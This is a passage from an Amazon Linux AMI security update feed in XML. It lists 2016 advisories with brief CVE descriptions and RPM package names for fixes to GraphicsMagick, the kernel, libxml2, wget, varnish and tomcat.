arch="x86_64"><filename>Packages/ImageMagick-c++-6.7.8.9-15.21.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.7.8.9-15.21.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.7.8.9-15.21.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.7.8.9-15.21.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.7.8.9-15.21.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.7.8.9-15.21.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.7.8.9-15.21.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.7.8.9-15.21.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.7.8.9-15.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-717</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-717: important priority package update for GraphicsMagick</title><issued date="2016-06-22 15:00:00" /><updated date="2016-06-22 15:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5241:
CVE-2016-5118:
It was discovered that ImageMagick did not properly sanitize certain input before using it to invoke processes. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.
1340814:
CVE-2016-5118 ImageMagick: Remote code execution via filename
CVE-2016-2318:
CVE-2016-2317:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2317" title="" id="CVE-2016-2317" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2318" title="" id="CVE-2016-2318" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5118" title="" id="CVE-2016-5118" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5241" title="" id="CVE-2016-5241" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick-debuginfo" version="1.3.24" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.24-1.8.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.24" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-1.3.24-1.8.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-doc" version="1.3.24" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.24-1.8.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.24" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.24-1.8.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.24" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.24-1.8.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.24" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.24-1.8.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.24" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.24-1.8.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.24" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-1.3.24-1.8.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.24" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.24-1.8.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.24" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.24-1.8.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.24" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.24-1.8.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.24" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.24-1.8.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.24" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.24-1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-718</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-718: medium priority package update for kernel</title><issued date="2016-06-24 22:21:00" /><updated date="2017-01-19 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9806:
A double free vulnerability was found in netlink_dump, which could cause a denial of service or possibly other unspecified impact.
1401502:
CVE-2016-9806 kernel: netlink: double-free in netlink_dump
CVE-2016-4998:
An out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments.
1349886:
CVE-2016-4998 kernel: out of bounds reads when processing IPT_SO_SET_REPLACE setsockopt
CVE-2016-4997:
A flaw was discovered in processing setsockopt for 32 bit processes on 64 bit systems. This flaw will allow attackers to alter arbitrary kernel memory when unloading a kernel module. This action is usually restricted to root-privileged users but can also be leveraged if the kernel is compiled with CONFIG_USER_NS and CONFIG_NET_NS and the user is granted elevated privileges.
1349722:
CVE-2016-4997 kernel: compat IPT_SO_SET_REPLACE setsockopt
CVE-2016-4951:
A vulnerability was found in the Linux kernel. The pointer to the netlink socket attribute is not checked, which could cause a null pointer dereference when parsing the nested attributes in function tipc_nl_publ_dump(). This allows local users to cause a DoS.
1338625:
CVE-2016-4951 kernel: Null pointer dereference in tipc_nl_publ_dump
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4951" title="" id="CVE-2016-4951" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4997" title="" id="CVE-2016-4997" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4998" title="" id="CVE-2016-4998" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9806" title="" id="CVE-2016-9806" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.14" release="24.50.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.14-24.50.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-719</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-719: important priority package update for libxml2</title><issued date="2016-07-14 16:30:00" /><updated date="2016-07-14 16:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4449:
XML external entity (XXE) vulnerability in the xmlStringLenDecodeEntities function in parser.c in libxml2 before 2.9.4, when not in validating mode, allows context-dependent attackers to read arbitrary files or cause a denial of service (resource consumption) via unspecified vectors.
1338701:
CVE-2016-4449 libxml2: Inappropriate fetch of entities content
CVE-2016-4448:
Format string vulnerability in libxml2 before 2.9.4 allows attackers to have unspecified impact via format string specifiers in unknown vectors.
1338700:
CVE-2016-4448 libxml2: Format string vulnerability
CVE-2016-4447:
The xmlParseElementDecl function in parser.c in libxml2 before 2.9.4 allows context-dependent attackers to cause a denial of service (heap-based buffer underread and application crash) via a crafted file, involving xmlParseName.
1338686:
CVE-2016-4447 libxml2: Heap-based buffer underreads due to xmlParseName
CVE-2016-3705:
Missing incrementation of recursion depth counter were found in the xmlParserEntityCheck() and xmlParseAttValueComplex() functions used for parsing XML data. An attacker could launch a Denial of Service attack by passing specially crafted XML data to an application, forcing it to crash due to stack exhaustion.
1332443:
CVE-2016-3705 libxml2: stack overflow before detecting invalid XML file
CVE-2016-3627:
Missing recursive loop detection checks were found in the xmlParserEntityCheck() and xmlStringGetNodeList() functions of libxml2, causing application using the library to crash by stack exhaustion while building the associated data. An attacker able to send XML data to be parsed in recovery mode could launch a Denial of Service on the application.
1319829:
CVE-2016-3627 libxml2: stack exhaustion while parsing xml files in recovery mode
CVE-2016-1840:
libxml2, as used in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted XML document, a different vulnerability than CVE-2016-1833, CVE-2016-1834, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, and CVE-2016-1839.
1338706:
CVE-2016-1840 libxml2: Heap-buffer-overflow in xmlFAParserPosCharGroup
CVE-2016-1839:
libxml2, as used in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted XML document, a different vulnerability than CVE-2016-1833, CVE-2016-1834, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, and CVE-2016-1840.
1338703:
CVE-2016-1839 libxml2: Heap-based buffer overread in xmlDictAddString
CVE-2016-1838:
libxml2, as used in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted XML document, a different vulnerability than CVE-2016-1833, CVE-2016-1834, CVE-2016-1836, CVE-2016-1837, CVE-2016-1839, and CVE-2016-1840.
1338705:
CVE-2016-1838 libxml2: Heap-based buffer overread in xmlPArserPrintFileContextInternal
CVE-2016-1837:
libxml2, as used in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted XML document, a different vulnerability than CVE-2016-1833, CVE-2016-1834, CVE-2016-1836, CVE-2016-1838, CVE-2016-1839, and CVE-2016-1840.
1338696:
CVE-2016-1837 libxml2: Heap use-after-free in htmlPArsePubidLiteral and htmlParseSystemiteral
CVE-2016-1836:
libxml2, as used in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted XML document, a different vulnerability than CVE-2016-1833, CVE-2016-1834, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, and CVE-2016-1840.
1338702:
CVE-2016-1836 libxml2: Heap use-after-free in xmlDictComputeFastKey
CVE-2016-1835:
libxml2, as used in Apple iOS before 9.3.2 and OS X before 10.11.5, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted XML document.
1338691:
CVE-2016-1835 libxml2: Heap use-after-free in xmlSAX2AttributeNs
CVE-2016-1834:
libxml2, as used in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted XML document, a different vulnerability than CVE-2016-1833, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, and CVE-2016-1840.
1338708:
CVE-2016-1834 libxml2: Heap-buffer-overflow in xmlStrncat
CVE-2016-1833:
libxml2, as used in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted XML document, a different vulnerability than CVE-2016-1834, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, and CVE-2016-1840.
1338682:
CVE-2016-1833 libxml2: Heap-based buffer overread in htmlCurrentChar
CVE-2016-1762:
libxml2 in Apple iOS before 9.3, OS X before 10.11.4, Safari before 9.1, tvOS before 9.2, and watchOS before 2.2 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted XML document.
1338711:
CVE-2016-1762 libxml2: Heap-based buffer-overread in xmlNextChar
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1762" title="" id="CVE-2016-1762" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1833" title="" id="CVE-2016-1833" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1834" title="" id="CVE-2016-1834" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1835" title="" id="CVE-2016-1835" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1836" title="" id="CVE-2016-1836" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1837" title="" id="CVE-2016-1837" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1838" title="" id="CVE-2016-1838" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1839" title="" id="CVE-2016-1839" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1840" title="" id="CVE-2016-1840" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3627" title="" id="CVE-2016-3627" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3705" title="" id="CVE-2016-3705" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4447" title="" id="CVE-2016-4447" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4448" title="" id="CVE-2016-4448" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4449" title="" id="CVE-2016-4449" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-static" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-6.3.49.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-6.3.49.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-6.3.49.amzn1.x86_64.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python26-2.9.1-6.3.49.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python27-2.9.1-6.3.49.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-6.3.49.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-6.3.49.amzn1.i686.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python27-2.9.1-6.3.49.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-6.3.49.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-6.3.49.amzn1.i686.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python26-2.9.1-6.3.49.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-6.3.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-720</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-720: medium priority package update for wget</title><issued date="2016-07-14 16:30:00" /><updated date="2016-07-14 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4971:
GNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource.
1343666:
CVE-2016-4971 wget: Lack of filename checking allows arbitrary file upload via FTP redirect
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971" title="" id="CVE-2016-4971" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wget" version="1.18" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-1.18-1.18.amzn1.x86_64.rpm</filename></package><package name="wget-debuginfo" version="1.18" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-debuginfo-1.18-1.18.amzn1.x86_64.rpm</filename></package><package name="wget-debuginfo" version="1.18" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/wget-debuginfo-1.18-1.18.amzn1.i686.rpm</filename></package><package name="wget" version="1.18" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/wget-1.18-1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-721</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-721: important priority package update for varnish</title><issued date="2016-07-14 16:30:00" /><updated date="2016-07-14 16:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8852:
Varnish 3.x before 3.0.7, when used in certain stacked installations, allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via a header line terminated by a \\r (carriage return) character in conjunction with multiple Content-Length headers in an HTTP request.
1328361:
CVE-2015-8852 varnish: http smuggling issues
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8852" title="" id="CVE-2015-8852" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="varnish-libs-devel" version="3.0.7" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-libs-devel-3.0.7-1.20.amzn1.x86_64.rpm</filename></package><package name="varnish-libs" version="3.0.7" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-libs-3.0.7-1.20.amzn1.x86_64.rpm</filename></package><package name="varnish" version="3.0.7" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-3.0.7-1.20.amzn1.x86_64.rpm</filename></package><package name="varnish-docs" version="3.0.7" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-docs-3.0.7-1.20.amzn1.x86_64.rpm</filename></package><package name="varnish-debuginfo" version="3.0.7" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-debuginfo-3.0.7-1.20.amzn1.x86_64.rpm</filename></package><package name="varnish-debuginfo" version="3.0.7" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-debuginfo-3.0.7-1.20.amzn1.i686.rpm</filename></package><package name="varnish-libs" version="3.0.7" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-libs-3.0.7-1.20.amzn1.i686.rpm</filename></package><package name="varnish" version="3.0.7" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-3.0.7-1.20.amzn1.i686.rpm</filename></package><package name="varnish-libs-devel" version="3.0.7" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-libs-devel-3.0.7-1.20.amzn1.i686.rpm</filename></package><package name="varnish-docs" version="3.0.7" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-docs-3.0.7-1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-722</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-722: medium priority package update for tomcat6 tomcat7 tomcat8</title><issued date="2016-07-20 18:00:00" /><updated date="2016-07-20 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5388:
1353809:
CVE-2016-5388 Tomcat: CGI sets environmental variable based on user supplied Proxy request header
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5388" title="" id="CVE-2016-5388" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-lib" version="6.0.45" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.45-1.5.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.45" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.45-1.5.amzn1.noarch.rpm</filename></package><package name="tomcat6-admin-webapps" version="6.0.45" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.45-1.5.amzn1.noarch.rpm</filename></package><package name="tomcat6-webapps" version="6.0.45" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.45-1.5.amzn1.noarch.rpm</filename></package><package name="tomcat6-docs-webapp" version="6.0.45" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.45-1.5.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.45" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.45-1.5.amzn1.noarch.rpm</filename></package><package name="tomcat6-el-2.1-api" version="6.0.45" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.45-1.5.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.45" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.45-1.5.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.45" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.45-1.5.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.35" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.35-1.61.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.35" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.35-1.61.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.35" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.35-1.61.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.35" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.35-1.61.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.35" release="1.61.amzn1" epoch="0" 